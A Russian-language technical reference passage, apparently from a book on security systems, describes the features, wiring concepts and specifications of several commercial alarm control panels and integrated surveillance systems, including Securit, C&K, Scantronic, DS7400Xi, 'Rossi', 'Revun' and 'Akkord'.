Основные характеристики контрольных панелей Securit 724/764'. > 8 программируемых шлейфов с двумя оконечными резисторами (подключаются к панели);
> расширение зон охраны до 24/64;
Рис. 2. 57. Состав серии Securit 724/764
> пульт управления с жидкокристаллическим дисплеем (до 16);
> число кодов пользователей до 16/32;
> - различие полномочий, защита от подбора кода;
> дистанционное программирование:
— программное деление на две индивидуально управляемые подсистемы, каждую из которых можно разделить на четыре независимых блока;
— 2 программируемых выхода сирены (12В, 500 мА);.
— 4 программируемых транзисторных выхода (12 В, 100 мА);
— до 32 программируемых релейных выходов;
> режим полной или два режима частичной охраны;
> память на 250/500 событий;
> порт RS-232 для подключения принтера, персонального компьютера и
других устройств;
> пакеты программ:
— дистанционного программирования;
— дистанционного контроля и управления;
— организации сети из 12 систем.
Структурная схема системы представлена на рис. 2. 58. Система не требует предварительного программирования и поддерживает все основные форматы передачи сообщений по телефонной линии.
При использовании системы возможно применение устройства набора кода EDS-18P, которое может находиться вне охраняемого помещения или внутри него.
В первом случае пользователь путем ввода персонального кода снимает (ставит) помещение с охраны, при этом контрольная панель фиксирует время снятия
Рис. 2. 58. Структура систем Securit 724/764
(постановки). Проникновение в помещение без ввода кода, пропадание питания или попытка вмешательства в охранную аппаратуру мгновенно вызывает срабатывание системы, при этом контрольная панель фиксирует время события.
Во втором случае используется модуль задержки, который включается в шлейф с мгновенной реакцией, что позволяет получить шлейф с задержкой тревоги. Извещатели включаются как в шлейф с мгновенной реакцией, так и в шлейф с задержкой тревоги. Пользователь открывает дверь и входит в помещение, при этом запускается модуль задержки тревоги. За время задержки пользователь должен ввести персональный код и снять помещение с охраны, при этом контрольная панель фиксирует время снятия. Если за отведенное время пользователь не ввел верный код, подается сигнал тревоги. Уходя, пользователь набирает персональный код и ставит помещение на охрану, при этом, спустя время задержки прохода, контрольная панель фиксирует время постановки. Пропадание питания или попытка вмешательства в охранную аппаратуру мгновенно вызывает срабатывание системы.
В любом из рассмотренных выше вариантов за работой системы осуществляется контроль сотрудниками охраны. Охранник может просматривать на жидкокристаллическом дисплее клавиатуры соответствующей контрольной панели номера шлейфов и названия помещений, поставленных на охрану. Они будут автоматически поочередно индицироваться на дисплее прибора. При тревоге включится сирена и на дисплее клавиатуры появится номер шлейфа и название помещения, в котором произошла тревога. Кроме того, охранник, обладающий соответствующим кодом, может просматривать содержимое памяти контрольной панели. Она имеет емкость на 500 событий и сохраняет следующую информацию:
> номер или название помещения и шлейфа;
> событие (снято/поставлено/тревога), которое произошло;
> дата и время регистрации события.
Эту информацию можно выводить в реальном масштабе времени на принтер или на дисплей персонального компьютера.
Система находит промышленное и коммерческое применение. Путем применения программного обеспечения Net Work XII имеется возможность организации системы на 24, 64, вплоть до 768 зон контроля.
Базовая конфигурация систем охранной сигнализации System 23xx
Системы моделей 236, 238, 2316 предлагают широкий спектр контрольных панелей для применения как в жилых домах, так и в коммерческих и промышленных помещениях. Все основные стандарты передачи информации имеют программную поддержку, что позволяет обеспечить раздельную, двукратную или резервную передачу информации по каналам связи. Панели обеспечивают контроль от 6 до 16 зон, имеют прекрасный современный дизайн. Возможно использование телевизионных систем и беспроводных радиошлейфов.
Рис. 2. 59. Структурная схема базовой системы System 23xx
Структурная схема базовой системы представлена на рис. 2. 59. Более подробно рассмотрим упомянутые выше (236, 238, 2316) системы и их составные части.
Шестизоновые контрольные панели System 236/2361 с устройством связи
Контрольная панель System 236/236i — это удачное решение для домашнего и коммерческого применения. Современный дизайн (рис. 2. 60), удобство и простота в использовании, высокая надежность, цифровое устройство связи — это далеко не все преимущества данной системы. Цифровое устройство связи панели 236i адаптировано для работы с отечественными телефонными линиями, в отличие от устройства связи панели 236, рассчитанного на напряжение телефонной линии 48 В.
Рис. 2. 60. Клавиатуры контрольных панелей System 236/2361
При использовании системы может применяться пакет программ дистанционного программирования Commander II, работающий в среде Microsoft Windows.
Особенности системы:
> шесть полностью программируемых зон и зона тревоги, включаемая с клавиатуры;
> два типа устройств для набора кода: со светодиодной и алфавитно-цифровой индикацией;
> дистанционное программирование в течение нескольких минут;
> регулируемые временные задержки входа/выхода;
> сообщения о состоянии контролируемых зон;
> 6 четырехзначных кодов с независимыми уровнями приоритетов.
Система не требует обязательного предварительного программирования и поддерживает все основные форматы передачи сообщений по телефонной линии. Программирование может быть выполнено в течение нескольких минут, что позволяет повысить надежность и удовлетворить требования большинства пользователей. Каждая охранная зона программируется для выполнения определенных функций: входа/выхода, входа/выхода с двойной задержкой, немедленной реакции, зоны прохода. Предусмотрены пожарные зоны, зоны принуждения (кнопка тревоги), круглосуточной охраны, несанкционированного вмешательства, неисправности. Задержка входа программируется на время от 10 до 300 с, а задержка выхода — от 10 до 150 с.
Система выводит на панель клавиатуры сообщения о состоянии контролируемых зон: нарушение, неисправность, исключение зоны из охраны, восстановление зоны, а также сообщения о пользователях системы (прерывание пользователем тревоги, снятие с охраны, постановка на охрану) и о состоянии системы
(отключение переменного напряжения, разряд аккумуляторной батареи, ошибка при дозвоне, переустановка системы, завершение программирования, перегорание предохранителя).
В системе используются 6 четырехзначных кодов пользователей с независимыми уровнями приоритетов. Коды устанавливаются администратором (он же первый пользователь). Шестизначный код установщика при монтаже системы позволяет программировать систему, но не может быть использован для постановки и снятия объекта с охраны.
Программируемый способ доступа к системе по телефонной линии исключает возможность несанкционированного доступа и позволяет игнорировать сигналы телефонных автоответчиков. Даже полное отключение питания не вызывает восстановления первоначального кода установщика.
Система позволяет использовать два типа клавиатур: светодиодную и алфавитно-цифровую с 32-символьным жидкокристаллическим дисплеем для системных сообщений. Выносные клавиатуры имеют современный дизайн.
Светодиодная клавиатура представлена двумя моделями: 236 Ledp и 236-2 Led. Это две привлекательные низкопрофильные клавиатуры с внутренней подсветкой. Они обеспечивают раздельную светодиодную индикацию для каждой зоны и индикацию состояния системы. Клавиатуры закрываются декоративной крышкой и имеют мягкий, нейтральный цвет, который сочетается практически с любым интерьером и текстурой стены. Клавиатуры потребляют ток до 40 мА. К системе можно подключить до 4 таких клавиатур.
Алфавитно-цифровая клавиатура Alpha Р имеет жидкокристаллический дисплей с внутренней подсветкой, отображающий до 32 символов системных сообщений. Сообщения могут выводиться на английском, испанском, французском, итальянском, немецком, португальском, венгерском, чешском, польском или голландском языках. Клавиатура потребляет ток 64 мА. К системе может быть подключено до 4 клавиатур Alpha Р.
Цифровое устройство связи по телефонной линии позволяет производить набор и автодозвон по трем 18-значным телефонным номерам. Два номера используются для передачи сообщений о состоянии системы и событиях, третий предназначен для дистанционного программирования. Набор номера может осуществляться как тоновым, так и импульсным способом. Система обеспечивает передачу двойных, раздельных и резервных сообщений. Двойное сообщение передается по обоим телефонным номерам, по одному номеру либо по одному с использованием второго, как резервного. Для дистанционного программирования и приема сообщений от контрольных панелей по телефонной линии используется пакет программ Monitor II, работающий в среде Microsoft Windows. Это позволяет осуществлять доступ к базе данных емкостью до 900000 номеров, содержащей планы охраняемых помещений и сведения о пользователях. Пакет программ Monitor удобен для организации централизованных постов наблюдения.
Основные технические характеристики системы:
Напряжение питания, В............................................................. 220/16
Потребляемая мощность, Вт............................................................... 25
Аккумуляторная батарея (6, 5 Ахч), В................................................. 12
Форматы приема информации:
Fast «А», Гц............................................................................. 2300
Slow «В», Гц............................................................................ 1400
Sum Check, Гц.......................................................................... 1400
Sum Check, Гц.......................................................................... 2300
AdemcoDTMF, Гц................................................................... 1400
Форматы сообщений:
3/1................................................................................... Extended
4/2.................................................................... CFSK III, SumCheck
Габаритные размеры, MM..................................................... 267х262х74
Масса, кг......................................................................................... 2, 1
Дополнительно система комплектуется герметичной аккумуляторной батареей типа 1265 с напряжением+ 12 В и емкостью 6, 5 ASч, телефонным проводом типа 9. Х PC/F с 8-штырьковым разъемом, блоком управления системой при помощи ключа типа 2310 KEY, выходным модулем для управления внешними устройствами типа 2300 DVR, замком Panel Lock с ключом для закрывания корпуса контрольной панели, датчиками открывания корпуса и снятия со стены типа Tamper Kit.
Восьмизоновые контрольные панели System 238/238i с устройством связи
Система 238i — это многоцветная экономичная контрольная панель фирмы С&К. Программирование системы может производиться с центральной станции управления или при помощи пульта управления на месте, что значительно упрощает монтаж и наладку системы. Внешний вид клавиатур контрольных панелей System 238/238i показан на рис. 2. 61.
Рис. 2. 61. Клавиатуры контрольных панелей System 238/238i
Особенности системы следующие.
Восемь полностью программируемых зон, включая одну специальную зону для детекторов с питанием по шлейфу, три зоны подачи сигнала тревоги с клавиатуры.
Передача сообщений по телефонной линии. Система поддерживает все основные форматы передачи сообщений по телефонной линии. Она совместима с автоответчиком. Передача происходит по одному или нескольким запрограммированным телефонным номерам. Может использоваться двукратная, раздельная или резервная передача информации.
Разнообразие стандартов передачи. В системе используется форматирование информации по стандартам: Fast «A» 2300 Гц; Slow «В» 1400 Гц; SumCheck 1400 Гц; SumCheck 2300 Гц; Ademco DYMF 1400 Гц; CFSK III. Форматы сообщений: 3/1 Extended; 4/2 CFSK III, SumCheck, 4+ 2 Ademco. Система обеспечивает защиту от неправильных и неполных соединений и специальную защиту от «пиратства».
Восемь кодов пользователей, состоящие от двух до пяти цифр с независимыми уровнями приоритетов. Коды устанавливаются хозяином или администратором (он же первый пользователь). Предусмотрена возможность использования кода «гостя» (временный код с длительностью действия до 15 дней).
Регулируемые временные задержки входа/выхода. Имеется возможность регулирования задержки входа и выхода на время от 10 до 300 с.
Сообщения системы:
> о состоянии контролируемых зон: нарушение, неисправность, исключение зоны из охраны, восстановление зоны;
> о пользователях системы: прерывание пользователем тревоги, снятие и постановка на охрану;
> о состоянии системы: отключение переменного напряжения, разряд аккумуляторной батареи, ошибка при дозвоне, переустановка системы, завершение программирования, перегорание предохранителя.
Совместно с системой используются два типа клавиатуры. Светодиодная клавиатура 238 Led Р привлекательна, имеет небольшие клавиши с внутренней подсветкой, обеспечивает раздельную светодиодную индикацию для каждой зоны и индикацию состояния системы. Она потребляет ток до 40 мА. К системе подключаются до 4 клавиатур Led Р.
Клавиатура типа Alpha Р с аналого-цифровым жидкокристаллическим дисплеем и внутренней подсветкой позволяет отобразить до 32 символов. Сообщения могут выводиться на десяти языках. Клавиатура потребляет ток до 64 мА. К системе можно подключить до 4 клавиатур Alpha Р.
Система содержит специальную защиту от «пиратства», которая защищает систему от несанкционированного проникновения в нее и от самовольного перепрограммирования при отключении питания.
Типичная система наблюдения, которая показана на рис. 2. 62, использует основные стандарты передачи информации по обычной телефонной сети, связывающей систему с персональным компьютером.
Рис. 2. 62. Вариант централизованной системы наблюдения с контрольной панелью System 238
Основные технические характеристики панелей System 238/238i:
Напряжение питания, В........................................................... 220 /16, 5
Потребляемая мощность, Вт............................................................... 25
Аккумуляторная батарея (6, 5 Ахч), В................................................. 12
Выход сирены:
напряжение, В...................................................................... 9, 5—14
ток, А.......................................................................................... 1, 5
Потребляемый ток в режиме покоя, мА.............................................. 100
Потребляемый ток во режиме набора, мА........................................... 120
Время реагирования (программируется), мс.................................. 5 — 750
Габаритные размеры:
модель 238, мм................................................................. 267х262х74
модель 238i, мм................................................................ 313х268х79
Масса:
модель 238, кг.............................................................................. 2, 1
модель 238i, кг............................................................................. 2, 5
Для дистанционного программирования с помощью персонального компьютера используется программное обеспечение Commander II. Для слежения за состоянием системы и дистанционного программирования используется программное обеспечение Monitor II. Имеется устройство для защиты программного обеспечения.
2.3.5. Охранные панели и системы фирмы Scantronic
Фирма Scantronic International Ltd. является одной из ведущих компаний в мире быстро растущей охранной промышленности. Ее продукция отличается прекрасным дизайном, высокой степенью надежности и удобством в использовании. В состав производимой фирмой продукции входит целое семейство охранных систем и панелей, а также множество различных детекторов и интерфейсов. Рассмотрим некоторые из них.
Панели дистанционного управления серии 8ххх
Панели дистанционного управления серии 8ххх — это одно из последних достижений фирмы Scantronic. В состав системы входят пульт управления, панель управления, клавиатура, детектор системы индивидуальной идентификации с датчиками и интерфейсами (рис. 2. 63).
Рис. 2. 63. Панели управления фирмы Scantronic
Панель управления 840i
Панель управления модели 840i обеспечивает контроль восьми программируемых зон. Имеется возможность расширения числа этих зон до 16 с помощью 8-зоновой сменной платы расширения ПКК №943 или до 40 зон с помощью 32-зоновой одношлейфовой платы №941
Полный 32-символьный текст, выводимый на дисплее клавиатуры, включает описание пользователей, номера зон и другую служебную информацию.
Систему характеризует простота установки режимов охраны путем ввода соответствующего кода с клавиатуры. Панель управления имеет встроенные устройства дистанционного управления и модем для передачи сообщений через телефонную сеть, а также дистанционный загрузчик для программирования, распознавания и дистанционного контроля состояния системы. Имеется возможность датирования до 400 событий и регистрации времени их свершения (визуальная, с распечаткой на принтере и с записью в памяти). Панель совместима с цифровыми коммуникаторами №8400, 8440, интерфейсом 9056 и имеет 4 выхода на реле и 32 выхода на детекторы. Она позволяет проводить разделение на 4 системы с возможностью создания подсистем. В панели используются клавиатуры 4-х типов (32 символа, большие клавиши, жидкокристаллический дисплей). Панель совместима со всеми устройствами системы индивидуальной идентификации (СИИ) данной серии.
Панель управления 8136i
Панель обеспечивает восемь программируемых зон охраны, предусмотрена возможность расширения до 16 зон с помощью 8-зоновой сменной платы расширения №943 или до 400 зон с помощью 32-зоновой платы расширения, или до 136 зон с помощью 4-х шлейфовой 128-зоновой платы расширения №142.
Панель позволяет производить датирование 500 событий и регистрацию времени их свершения (визуальная, с распечаткой на принтере и с записью в память). Панель имеет 4 выхода на реле и 228 выходов на детекторы.
Панели серии 8ххх используют в своем составе клавиатуры следующих моделей:
> 925 — традиционный стиль Remus, 32 символа, жидкокристаллический (Ж К) дисплей;
> 926 — современный дизайн, 32 символа, ЖК дисплей;
> 928 — терминал, оснащенный светодиодной индикацией;
> 929 — 8 символьный дисплей с подсветкой изнутри;
> 930 — большие клавиши, 32 символа, ЖК дисплей.
Системы Series 8ххх имеют в своем составе 32-зоновую систему индивидуальной идентификации (СИИ), которая разработана фирмой Scantronic и предназначена для работы с панелями серии Series 8ххх типа 840i и 8136i. Основой системы является уникальная микросхема с программным управлением, обеспечивающая соединение всех зон с помощью стандартного 3-х жильного кабеля. Допускается организация последовательного опроса и звездообразная конфи-
Рис. 2. 64. Устройства системы индивидуальной идентификации
гурация цепи. Оконечные устройства системы могут быть выполнены на основе СВЧ и инфракрасных детекторов. Некоторые типы этих устройств представлены на рис. 2. 64.
Для соединения различных приборов СИИ используются специально разработанные интерфейсы. Внешний вид одного из них представлен на рис. 2. 65. Характеристики интерфейсов:
> 901 — одноточечный проводной универсальный модуль интерфейса для использования с датчиками, выпускаемыми фирмой Scantronic. Каждый прибор имеет программируемый выход на слаботочное реле или на другое токовое устройство.
Рис. 2. 65 Внешний вид интерфейса для соединения различных СИИ
> 902 — одноточечный проводной модуль с 6-контактным разъемом для работы с датчиком любого типа.
> 903 — закрытый интерфейс с одним двухполюсным входом зоны и изолирующими питающими проводами (240 В/50 Гц) для переключения программируемого выхода на реле.
> 904 — закрытый интерфейс с одним двухполюсным входом зоны и низковольтное переключение программируемого выхода на реле (2 А/24 В).
> 905 — закрытый интерфейс типа IDISLIM с пятью двухполюсными входами зоны и пятью выходами типа «открытый коллектор» с программным управлением (предельно допустимый ток 0, 1 А на каждом выходе, напряжение+ 12 В)
> 906 — модуль звукового сигнализатора IDISSBS для работы в качестве внешнего устройства звуковой сигнализации вместо существующего стандартного блока SAB/SCB.
Система безопасности Scantronic 750
Устройство Scantronic 750 представляет собой контроллер-коммутатор на базе микропроцессора с полным набором функций систем охраны, совместимый со всеми используемыми форматами приемных устройств (рис. 2. 66).
Система идеальна для установки в домашних условиях и на предприятиях среднего и малого бизнеса, когда требования к характеристикам, гибкости и надежности максимальны.
Характеристики контрольной панели:
> загрузка с персонального компьютера;
> 6 зон, программируемых на звуковую или незвуковую сигнализацию тревоги, звуковую сигнализацию пожара и моментального сигнала вторжения с задержкой или со слежением;
> быстрый отклик на воздействие последовательно от каждой зоны;
рис.2.66 Система безопасности SP750
> выводы на СИД (светодиодный индикаторный дисплей) с использовани ем шины данных и синхронизирующих импульсов;
> - программирование задержки входа/выхода на время от 10 до 150 с;
> индикация тревоги звуковым сигналом;
> работа с резервной батареей гелиевого типа емкостью от 4 до 7 Ахч и напряжением+ 12 В;
> системное ПЗУ с электрическим стиранием защищает коды пользователя
во время молнии и перебоях напряжения сети. Характеристики модема:
> резервный телефонный номер, который может быть использован для вы дачи команд открыть/закрыть;
> импульсный и тоновый набор телефонного номера;
> обнаружение тонового набора;
> стандартный формат сообщений;
> автоматическое вхождение в связь (1400/230 Гц);
> программирование задержки сообщения на время от 10 до 150 с;
> сообщение о пропадании (перебоях) сетевого питания;
> программирование числа попыток набора от 1 до 15;
> сообщение о неисправности пожарной сигнализации;
> 3—4 цифровых учетных номера;
> линия захвата с двухполюсным переключателем на два направления;
> восстановление сообщений по зонам. Характеристики клавиатуры:
> 5 зон, управляемых с клавиатуры, круглосуточные зоны тревоги (с сооб щениями или без);
> индикация неисправностей;
> пожарная индикация по зонам;
> блокировка зон при установке, включая зону круглосуточной охраны;
> широкоугольный СИД;
> максимум 4 клавиатуры на систему;
> звуковая сигнализация при условиях близких к тревоге или повреждению;
> 5 кодов доступа с возможностью их изменения пользователем;
> программирование функций системы с клавиатуры.
Каждый блок укомплектован трансформатором переменного тока и одной выносной 4-х проводной клавиатурой привлекательного дизайна, которая также выполняет функцию программатора. Имеется возможность переключения режима работы при использовании 6-й зоны. Линии данных и синхронизирующих импульсов использованы в качестве выходов на СИД при работе переключателя. Устройство программируется заводом-изготовителем для проверки сразу же после доставки и монтажа.
Система безопасности Scantronic Avenger 9000
-Система безопасности Scantronic Avenger 9000 (AV9000) представляет собой 8-зоновое устройство с цифровым модемом (рис. 2.67). Устройство может быть запрограммировано с помощью клавиатуры либо с IBM PC-совместимого компьютера, используя программу Scan Pro DownLoad. Эта программа обеспечивает работу в режиме дистанционного управления и выдает информацию о состоянии системы.
Рис. 2. 67. Система AV9000
Система AV9000 пригодна для установки в домашних условиях, а также для использования на предприятиях малого бизнеса. Особенности системы:
> до восьми управляемых зон;
> часы реального времени;
> запоминание состояния тревоги;
> до 8 кодов пользователя с возможностью их открытия/закрытия пользователем;
> автоматический таймер начала контроля состояния системы;
> два способа программирования: с клавиатуры или загрузка с помощью программы Scan;
> встроенная схема шунтирования детектора звонка;
> встроенный цифровой коммуникатор.
Система содержит плату вывода данных, которая представляет собой восемь программно-управляемых выходов. На основную панель управления поступают следующие сигналы управления: взлома, пожара, сигнал готовности, дистанционный зуммер, выход на световую сигнализацию. Функции цифрового коммуникатора:
> раздельные сообщения на учетные номера;
> сообщение о срабатывании зоны;
> программа начальной загрузки;
> задержка сообщений о срабатывании по зонам;
> сигнализация тревоги, повреждения, запоминание сообщений по зонам;
> тональный или импульсный набор;
> сообщение времени события;
> дистанционное отключение пользователей;
> возможность программирования с помощью IBM PC-совместимого ком пьютера.
Сообщения коммуникатора передаются в стандартных форматах импульсных сообщений, включая Extended, Ademco Highsperd, Scantronic ScanPro и Scantronic (Acron) Superfast.
Система оснащена прекрасной по дизайну и своим функциональным возможностям клавиатурой. Функции пользователя, контролируемые с клавиатуры, состоят в следующем: оснастка/переоснастка, индивидуальная или групповая блокировка зон, 4 аварийных функции, сброс детектора табачного дыма, функция звонка, установка времени и даты, установка задержки времени входа/выхода, системный тест.
Модель AV9000F размещается в стальном корпусе вместе с источником питания и клавиатурой типа EKP1LED или EKP1LLCD, дополнительно имеется клавиша блокировки.
Модель AV9000 может быть использована для охраны двух независимых объектов, определяемых как сектора, с зонами, установленными изготовителем. Каждый сектор соответствует четырем зонам, четырем пользователям, одному времени прохода и двум клавиатурам, что делает систему идеальной для установки в домашних условиях.
Программа управления системы позволяет реализовать следующие характеристики управления:
> модификацию зон;
> сообщение открыть/закрыть;
> формирование тестового сообщения для проверки связи по одному из трех телефонных номеров;
> блокировка сигнала ложной тревоги;
> конфиденциальность.
Контрольная панель Classic 6
Современный внешний вид панели, встроенная клавиатура, более простые интерфейсы, чем у других панелей, — все это делает контрольную панель Classic 6 удобной для использования при охране квартир, офисов, складов, магазинов и других объектов малого и среднего бизнеса (рис. 2. 68).
Панель отвечает всем необходимым требованиям безопасности и удобна в использовании.
Рис. 2. 68. Контрольная панель Classic 6
Основные характеристики панели Classic 6:
> 6 полностью программируемых зон;
> 10 кодов программирования (8 кодов пользователей, технический код, код принуждения);
> встроенная клавиатура с возможностью программирования энергонеза висимого ПЗУ;
> интерфейс на дистанционную клавиатуру (до 2-х клавиатур модели 9425);
> выход на внутреннее звуковое реле с 2-мя дополнительными программи руемыми выходами;
> встроенный громкоговоритель с регулятором громкости;
> программируемое энергонезависимое ПЗУ;
> регистрация 15 событий;
> стандартные выходы на коммуникатор;
> дополнительный расширитель для выходов отдельных зон;
> работа со слаботочными устройствами.
Панель управления модели 9448
Эта модель во многом схожа с рассмотренным выше устройством (рис. 2. 69). Выполняя те же функции, модель 9448 имеет следующие особенности:
> 5 зон охраны;
> встроенная клавиатура;
> встроенный и внешний громкоговоритель сопротивлением 16 Ом;
> выбор полной или частичной установки;
> программируемый маршрут прохода;
> вспомогательный источник питания на 300 мА.
Рис. 2. 69 Панель управления модели 9448
2.3.6. Универсальная программно-контрольная охранно-пожарная панель DS7400Xi с мультиплексной шиной
Панель DS7400Xi — это устройство, обеспечивающее охрану и пожарную безопасность помещений. Она имеет встроенный модем, подключаемый к двум телефонным линиям. Возможно подключение до 8 клавиатур и взаимодействие с компьютером через стандартный интерфейс RS-232. Основные характеристики:
> 8 базовых зон с расширением до 16 при 2-х проводной системе подключения извещателей;
> расширение до 128 зон при 4-х проводной схеме подключения извещателей;
> возможность программирования пожарных шлейфов с подтверждением тревоги;
> логическое деление на 4 подсистемы;
> до 36 программируемых релейных выходов;
> 2 базовых программируемых выхода типа «открытый коллектор» (12 В/1 А и 12 В/500 мА);
> 60 паролей пользователей с многоуровневыми полномочиями;
> возможность подключения до 8 клавиатур;
> память на 400 событий;
> возможность подключения принтера;
> встроенный модем;
> программное обеспечение для дистанционного программирования и контроля состояния системы.
Рис. 2. 70. Применение панели DS7400Xi
Структурная схема системы охраны на основе приемно-контрольной охранно-пожарной панели DS7400Xi представлена на рисунке 2. 70.
Система не требует предварительного программирования и поддерживает все основные форматы передачи сообщений по телефонной линии. Информацию, содержащуюся в памяти панели, можно выводить в реальном масштабе времени на принтер или на персональный компьютер.
2.3.7. Интегрированная охранная система «Росси»
Система «Росси» представляет собой модульную компьютерную систему охраны, включающую в себя: многоканальную систему видеонаблюдения, систему контроля охранных датчиков, систему ограничения доступа, систему удаленного видеоконтроля и управления.
Интегрированная охранная система «Росси» (рис. 2. 71) состоит из следующих составных частей:
«Росси-1» — единый центр управления;
«Росси-2» — охранная система стационарных объектов;
«Росси-3» — мобильная система охраны.
Система предназначена для охраны банков, складов, офисов, территорий вблизи домов, автомобилей и т. п. Система видеонаблюдения обеспечивает интеллектуальный алгоритм обнаружения движения, определяя тем самым новый уровень качества работы за счет уменьшения количества ложных тревог без ухудшения
Рис. 2. 71. Охранная система "Росси".
качества изображения. Возможность программирования параметров алгоритма работы позволяет системе эффективно функционировать в сложных условиях наружного наблюдения.
Адаптивное компьютерное управление поворотным устройством позволяет автоматически сопровождать движущиеся объекты, обеспечивая непрерывное отображение их на экране монитора и запись на видеомагнитофон без участия оператора.
Для ввода сигналов изображения с видеокамеры и их оцифровки применяются специальные платы ввода видеосигналов. Использование цифровой обработки телевизионных сигналов обеспечивает компрессию поступающих изображений с последующей передачей их по различным каналам связи, в том числе по стандартным телефонным каналам, радиоканалу, лазерному И К каналу.
Характеристики платы ввода изображения:
> три входа для подключения ТВ сигнала цветного (PAL) или черно-белого изображения;
> один выход для подключения ТВ монитора;
> разрешение изображения при выводе на экран монитора 512х512 точек (8 бит на точку);
> дополнительная память для наложения на изображение служебной информации (256х256 точек, 4 бита на точку).
Передача изображения осуществляется в формате 256х256 точек (8 бит на точку). Формат компрессии JPEG, качество восстановления 70%, время передачи менее 1 с при скорости 28800 бод.
Система «Росси» ведет постоянный контроль состояния охранных датчиков. Предварительное программирование режимов работы установленных датчиков позволяет автоматически коммутировать необходимые камеры на экран монитора или видеомагнитофон. Для коммутации ТВ камер используются видеомультиплексоры фирмы Dedicated Micros.
Плата обработки сигналов обеспечивает ввод в компьютер информации о состоянии 8 охранных датчиков и двух релейных выходов, формирующих сигналы контроля. Имеется программное обеспечение для управления контрольной панелью VISTA-501.
Интеллектуальное управление системой ограничения доступа позволяет жестко следить за проходом и перемещениями по охраняемой территории. Управление с компьютера даже простейшими системами ограничения доступа дает возможность создания журналов посещения на большое количество пользователей. Требования к конфигурации персонального компьютера приведены в табл. 2. 5.
Для централизованного видеоконтроля удаленных объектов возможно их объединение в единую глобальную систему с одним центром управления. Используя стандартные телефонные каналы связи, можно управлять несколькими системами из любой точки мира. Полная дистанционная настройка периферийных систем охраны с центрального пункта позволяет свести к минимуму обслуживающий персонал удаленных охраняемых объектов.
Система «Росси» является полностью совместимой со всеми стандартными черно-белыми и цветными системами охранного телевидения. Она достаточно просто включается в новые или уже существующие системы охраны, обеспечивая повышение их уровня безопасности.
Таблица 2. 5. Требования к конфигурации персонального компьютера
Процессор |
i80486DX2-66 и лучше |
ОЗУ |
4Мбайт |
Жесткий диск |
не менее 240 Мбайт |
Дисковод |
3, 5"; 1, 44 Мбайт |
Оперативная система |
MS-DOS 5. 0 и выше |
Порт связи |
RS-232C (COM), LPT |
Количество слотов ISA |
3 |
2. 3. 8. Звуковая охранная сигнализация «Ревун»
Звуковая охранная сигнализация «Ревуна предназначена для охраны стационарных объектов. Она оснащена встроенной сиреной мощностью 110 дБ, имеет автономное питание и обеспечивает три зоны охраны. Система позволяет использовать ИК детекторы, детекторы битого стекла, контактные датчики, пожарные датчики и др.
Основные технические характеристики сигнализации «Ревуна:
Количество зон охраны...................................................................... 3
Мощность встроенной сирены, дБ..................................................... 110
Встроенный аккумулятор, Ахч........................................................... 1, 6
Напряжение питания, В..................................................................... 12
Диапазон рабочих температур, С....................................... от -30 до+ 40
Габаритные размеры металлического корпуса, мм..................... 175х275х50
Масса не более, кг............................................................................ 2, 0
Структурная схема сигнализации "Ревун" представлена на рис. 2.72.
Сигнализация имеет три зоны охраны:
> зона 1 — зона с задержкой срабатывания на вход;
> зона 2 — зона мгновенного срабатывания (включает в себя ИК детекторы, детекторы битого стекла, оконную фольгу);
Рис. 2.72. Структурная схема охранной сигнализации «Ревун»
> зона 3 — зона круглосуточной охраны (включает в себя кнопки тревоги, пожарные датчики, линии Tamper установленного оборудования: видеокамер, охранных датчиков, выносных сирен).
Питание системы осуществляется от встроенной аккумуляторной батареи (12 В/1, 6 Ахч), которая автоматически подзаряжается от сети переменного тока. Система имеет вход для подключения выносного выключателя блока. Кроме того, система имеет выходы:
> для подключения внешних сирен, стробовспышек;
> для подключения внешних устройств (ток нагрузки до 1 А);
> для подключения выносного охранного маячка;
> для управления автодозвонщиком;
> «+ 12 В/1, 6 Ахч» для охранных датчиков и другого оборудования, требующего бесперебойного питания. Блок управления системы позволяет осуществлять следующие регулировки:
времени задержки на вход, с.......................................................... 1 — 60
времени звучания сирены при срабатывании зоны 1, мин................... 1—5
времени звучания сирены при срабатывании зоны 2, мин................... 1—5
Интервалы задержек по зонам устанавливаются подстроечными резисторами R1, R2, R3 соответственно, расположенными на плате управления блока.
2. 3. 9. Прибор приемно-контрольный охранно-пожарный «Аккорд»
Прибор предназначен для автономной или централизованной охраны квартир, коттеджей, офисов, магазинов, складов, пунктов обмена валюты и т. п. Он обеспечивает контроль четырех шлейфов сигнализаций (ШС) как в автономном режиме с подачей звукового и светового сигнала, так и с передачей тревожного извещения на пульт централизованного наблюдения (ПЦН) по телефонной линии. Пример использования прибора показан на рис. 2. 73. Прибор контролирует 4 шлейфа сигнализации:
> охранный с задержкой включения встроенной сирены (тревога на пульт передается мгновенно при нарушении любого шлейфа);
> охранный (возможно питание от шлейфа извещателя «Волна-5»);
> тревожный (кнопка тревоги) с 15-минутной памятью состояния тревоги;
> пожарный (возможно питание от шлейфа до 5 дымовых датчиков).
Управление режимом работы прибора осуществляется либо переключателем на приборе, либо с выносного шифроустройства четырехзначным кодом (рис. 2. 74). Режимы работы прибора:
> режим частичной охраны — контроль одного (пожарный ШС4) или двух (тревожный ШСЗ и пожарный ШС4) шлейфов;
> режим полной охраны — контроль всех четырех шлейфов;
> режим входа/выхода.
Рис. 2.73. Структурная схема использования прибора «Аккорд»
В этих режимах состояние тревоги сопровождается выдачей тревожного извещения при нарушении ШС или вскрытии прибора путем размыкания контактов реле или передачей модулированных ВЧ сигналов по системе "Атлас-3", "Атлас-6"; включением встроенной (12 В) или внешней (220 В) сирен и внешнего светового оповещателя (лампы 220 В или 24 В).
Рис. 2.74 Прибор «Аккорд»
При входе на объект прибор обеспечивает задержку на включение оповещателей, а при выходе — блокировку сигналов от датчиков на время, необходимое для-выхода и закрывания двери.
Кроме шлейфов сигнализации ШСЗ, ШС4, описанных выше, в приборе используются еще два шлейфа:
> ШС1 — шлейф охранной сигнализации с задержкой включения звуковых и световых оповещателей;
> ШС2 — шлейф охранной или пожарной сигнализации с возможностью
питания извещателей по шлейфу (постоянным напряжением 24 В). Существует несколько вариантов работы прибора. "Аккорд":
> постановка на охрану с закрытой дверью с ограничением времени выхода (10-50 с);
> постановка на охрану с открытой дверью с неограниченным временем выхода (до закрывания двери);
> при снятии с охраны после нарушения ШС1 время до включения оповещателей ограничено (10—50 с).
Выбор вариантов происходит автоматически: если при нажатии кнопки «Охрана» шлейф ШС1 разомкнут (дверь открыта), то включение режима охраны произойдет через 10 с после восстановления ШС1 (закрывание двери). Если ШС1 замкнут (дверью закрыта), то режим охраны включится через 10—50 с.
